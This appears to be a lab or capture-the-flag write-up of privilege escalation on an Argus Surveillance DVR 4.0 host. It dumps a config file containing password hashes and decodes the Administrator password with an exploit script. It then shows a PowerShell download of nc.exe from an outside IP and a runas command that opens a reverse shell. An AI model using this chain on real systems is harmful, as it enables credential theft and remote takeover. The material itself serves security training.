Priv Escalation

Argus Surveillance DVR 4.0 - Weak Password EncryptionExploit Database

After going through the multipe exploits that I saw that the application was vulnerable to, I was not able to write in the locations where the exploits were telling me to.

With this exploit I was able to read the hash for the Administrative User.

type "C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini"
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DialUpUseDefaults=1
DialUpUserName=
DialUpPassword=
DialUpDomain=
DialUpPhone=
ConnectCameraAtStartup=1
ConnectSessionFile=Argus Surveillance DVR.DVRSes
StartAsService=1
RunPreviewAtStartup=1
FullScreenAtStartup=0
GalleryFolder=C:\ProgramData\PY_Software\Argus Surveillance DVR\Gallery\
RecordEncryptionPassword=
RecordFrameInterval=200
RecordMaxFileSize=0
RecordEncryption=0
RecordAllTime=0
RecordSound=1
RecordMotion=1
RecordCamName=1
RecordCamLocation=1
RecordCamDescript=1
HTTP_AlwaysActive=1
HTTP_Port=8080
HTTP_Interval=100
HTTP_LimitViewers=0
HTTP_NeedAuthorization=0
HTTP_NeedLocalAuthorization=0
HTTP_MaxNumberOfViewers=100
HTTP_AudioEnabled=1
HTTP_StreamEnabled=1
HTTP_EncriptionType=0
HTTP_VideoBitRate=204800
HTTP_DisconnectInactiveUsers=0
HTTP_MaxInactivityTime=0
HTTP_MaxConnectionMinutes=0
HTTP_ReconnectAgain=0
WriteHTTPLog=1
WriteMotionLog=1
WriteEventsLog=1
LimitMaxSizeOfLogFile=1
MaxSizeOfLogFile=10000
UseRedirect=1
UseWebMonitoring=0
PYSoftAccountEmail=
PYSoftAccountPsw=
AskLoginAtStartup=0
TaskTrayPassword=
StealthMode=0
AskForConfirmationOnExit=0
Watchdog_PollingIntrvl=20
Watchdog_RestartProgramPolls=20
Watchdog_Reboot=0
Watchdog_RebootTries=20
Watchdog_RebootPeriodically=1
Watchdog_RebootPeriodclType=1
Watchdog_RebootInterval=1
Watchdog_Hours=24
Watchdog_Days=1
Watchdog_DayOfWeek=0
Watchdog_Month=1
Watchdog_RebootIfCPU=0
Watchdog_RebootIfCPUType=0
Watchdog_CPU=98
Watchdog_RebootIfCPUPolls=20
Watchdog_IsRemoteAccess=0
Watchdog_AccessPort=10000
Watchdog_AccessID=
Watchdog_AccessPsw=
DynIPNextConnectTime0=0
DynIPNextConnectTime1=0
MonitorNextConnectTime0=0
MonitorNextConnectTime1=0
SMSNextConnectTime0=0
SMSNextConnectTime1=0
UseScreenSaver=0
ScreenSaveTimeOut=5
MaxFileSize=2048
StreamToWeb=0
WebPageBackColor=16767949
WebPageTextColor=0
WebPageLinkColor=0
WebPageActiveLnkColor=0
WebPageVisitedLnkColor=0
WebPageActiveXColor=0
PreviewByOCX=1
ReduceCPUUsage=1
MaximumCPUUsage=95
ActionsAllTime=0
DetectMotion=0
DetectionInterval=500
MotionDetectionDelay=1000
DifferencesThreshold=5
MotionDifSensitivity=0
MotionDontTriggerIfMuch=0
MotionDontTriggerTrshld=90
MotionSensitivityCnst=90
MotionSensitivity1=30
MotionSensitivity2=21
MotionSensitivity3=17
MotionSensitivity4=15
MotionSensitivity5=15
MotionSensitivity6=17
MotionSensitivity7=21
MotionSensitivity8=30
MotionMinActionDuration=2000
MotionSendEmail=0
EmailUsePysoftMailServer=0
MotionEmailServer=
MotionEmailNeedPassword=0
MotionEmailAccountName=
MotionEmailPassword=
MotionEmailSMTPPort=25
MotionEmailSender=
MotionEmailAddress=
MotionEmailSubject=4D6F74696F6E207B4D4F54494F4E7D2520686173206265656E206465746563746564212121
MotionEmailMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F5449
4F4E7D25206D6F74696F6E20696E20746865207761746368656420617265612E
MotionEmailInterval=20
MotionEmailAttachImage=1
MotionEmailNumberOfImages=3
MotionEmailPriority=1
FacesDetect=0
FacesHighlight=1
FaceDetectSensitivityInPercents=50
FaceDetecMinFaceInPercents=10
MotionPlaySound=0
MotionSoundFile=
MotionLanchApplication=0
MotionApplicationFile=
MotionRecordVideo=0
MotionVideoDuration=120
MotionPreVideoDuration=2
MotionWriteSnapshots=0
MotionSnapshotDuration=10
MotionChangeSettings=0
MotionImageQuality=70
MotionSoundQuality=70
MotionRecordInterval=133
MotionChangeSettingsDuration=10
MotionDrawMotionValue=0
MotionHighlightMoving=0
SendSMS=0
SMSSender=
SMSPhone=
SMSMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25
206D6F74696F6E20696E20746865207761746368656420617265612E
RemoveObsoleteFiles=1
DaysToDeleteObsoleteFiles=7
LastReadNetCamsListDay=44760

[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
FullName0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C87
59083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
FullControl0=1
CanClose0=1
CanPlayback0=1
CanPTZ0=1
CanRecord0=1
CanConnect0=1
CanReceiveAlerts0=1
CanViewLogs0=1
CanViewCamerasNumber0=0
CannotBeRemoved0=1
MaxConnectionTimeInMins0=0
DailyTimeLimitInMins0=0
MonthlyTimeLimitInMins0=0
DailyTrafficLimitInKB0=0
MonthlyTrafficLimitInKB0=0
MaxStreams0=0
MaxViewers0=0
MaximumBitrateInKb0=0
AccessFromIPsOnly0=
AccessRestrictedForIPs0=
MaxBytesSent0=0
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Description0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60
C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
Disabled0=0
ExpirationDate0=0
Organization0=
OrganizationUnit0=
Phone10=
Phone20=
Fax0=
Email0=
Position0=
Address10=
Address20=
City0=
StateProvince0=
ZipPostalCode0=
Country0=
ComputerID0=
TrialAccount0=0
UserID1=576846
LoginName1=Viewer
FullName1=
FullControl1=1
CanClose1=1
CanPlayback1=1
CanPTZ1=1
CanRecord1=1
CanConnect1=1
CanReceiveAlerts1=1
CanViewLogs1=1
CanViewCamerasNumber1=0
CannotBeRemoved1=0
MaxConnectionTimeInMins1=0
DailyTimeLimitInMins1=0
MonthlyTimeLimitInMins1=0
DailyTrafficLimitInKB1=0
MonthlyTrafficLimitInKB1=0
MaxStreams1=0
MaxViewers1=0
MaximumBitrateInKb1=0
AccessFromIPsOnly1=
AccessRestrictedForIPs1=
MaxBytesSent1=0
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
Description1=
Disabled1=0
ExpirationDate1=0
Organization1=
OrganizationUnit1=
Phone11=
Phone21=
Fax1=
Email1=
Position1=
Address11=
Address21=
City1=
StateProvince1=
ZipPostalCode1=
Country1=
ComputerID1=
TrialAccount1=0

The hash of the Administrator user turned out to be:

"ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"

I changed the hash into the exploit.

# ASCII art is important xD
banner = '''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
'''
print(banner)

# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
if (len(pass_hash)%4) != 0:
	print("[!] Error, check your password hash")
	exit()
split = []
n = 4

Ran the exploit to decrypt the password.

python3 /usr/share/exploitdb/exploits/windows/local/50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

The password turned out to be 14WatchD0g but unfortunately the last character we were not able to crack. In order to see which character the exploit was not able to crack we created a new account with a bunch of special characters to see what the D9A8 meant.

At last

• ! = B398

• @ = 78A7

• # = <blank> (This is probably why the first password didn't work)

• $ = D9A8

The D9A8 turned out to be the dollar sign. So the password was 14WatchD0g$. Unfortunately after trying to SSH with that password I was unable to, therefore we must use runas to execute nc or a payload of our own.

powershell.exe -c "iwr http://192.168.49.100:443/nc.exe -OutFile C:\Users\viewer\nc.exe"

runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe 192.168.49.100 443"
Enter the password for DVR4\Administrator: